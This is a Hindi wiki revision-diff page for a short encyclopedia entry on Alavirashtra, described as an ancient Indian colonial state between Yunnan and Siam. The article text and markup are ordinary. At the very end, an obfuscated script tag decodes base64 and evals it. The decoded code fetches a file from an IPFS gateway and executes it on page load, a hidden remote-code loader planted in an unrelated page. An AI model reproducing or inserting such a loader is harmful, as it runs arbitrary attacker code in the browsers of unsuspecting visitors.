Difference between revisions of "अलाविराष्ट्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*दक्षिण-पूर्व एशिया का प्राचीन भारतीय औपनिवेशिक राज...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*दक्षिण-पूर्व एशिया का प्राचीन भारतीय औपनिवेशिक राज्य जिसकी स्थिति युन्नान (प्राचीन [[गंधार]]) के पूर्व और स्याम के पश्चिम में थी।  
+
'''अलाविराष्ट्र''' दक्षिण-पूर्व [[एशिया]] का एक प्राचीन भारतीय औपनिवेशिक राज्य था, जिसकी स्थिति 'युन्नान' (प्राचीन [[गंधार]]) के पूर्व और स्याम देश के पश्चिम में थी।
*इस राष्ट्र का उल्लेख इस देश के प्राचीन पाली इतिहास-ग्रन्थों में है।
 
*अलावि के दक्षिण में खेमराष्ट्र की स्थित था।
 
  
 +
*इस राष्ट्र का उल्लेख इस देश के प्राचीन [[पाली]] इतिहास ग्रन्थों में है।
 +
*अलावि के दक्षिण में [[खेमराष्ट्र]] की स्थित थी।
  
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{विदेशी स्थान}}
[[Category:ऐतिहासिक_स्थान_कोश]]
+
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:ऐतिहासिक_स्थान_कोश]][[Category:ऐतिहासिक_स्थल]]
[[Category:ऐतिहासिक_स्थल]]
 
 
 
 
__INDEX__
 
__INDEX__

Revision as of 09:49, 12 November 2012

alavirashtr dakshin-poorv eshiya ka ek prachin bharatiy aupaniveshik rajy tha, jisaki sthiti 'yunnan' (prachin gandhar) ke poorv aur syam desh ke pashchim mean thi.

  • is rashtr ka ullekh is desh ke prachin pali itihas granthoan mean hai.
  • alavi ke dakshin mean khemarashtr ki sthit thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>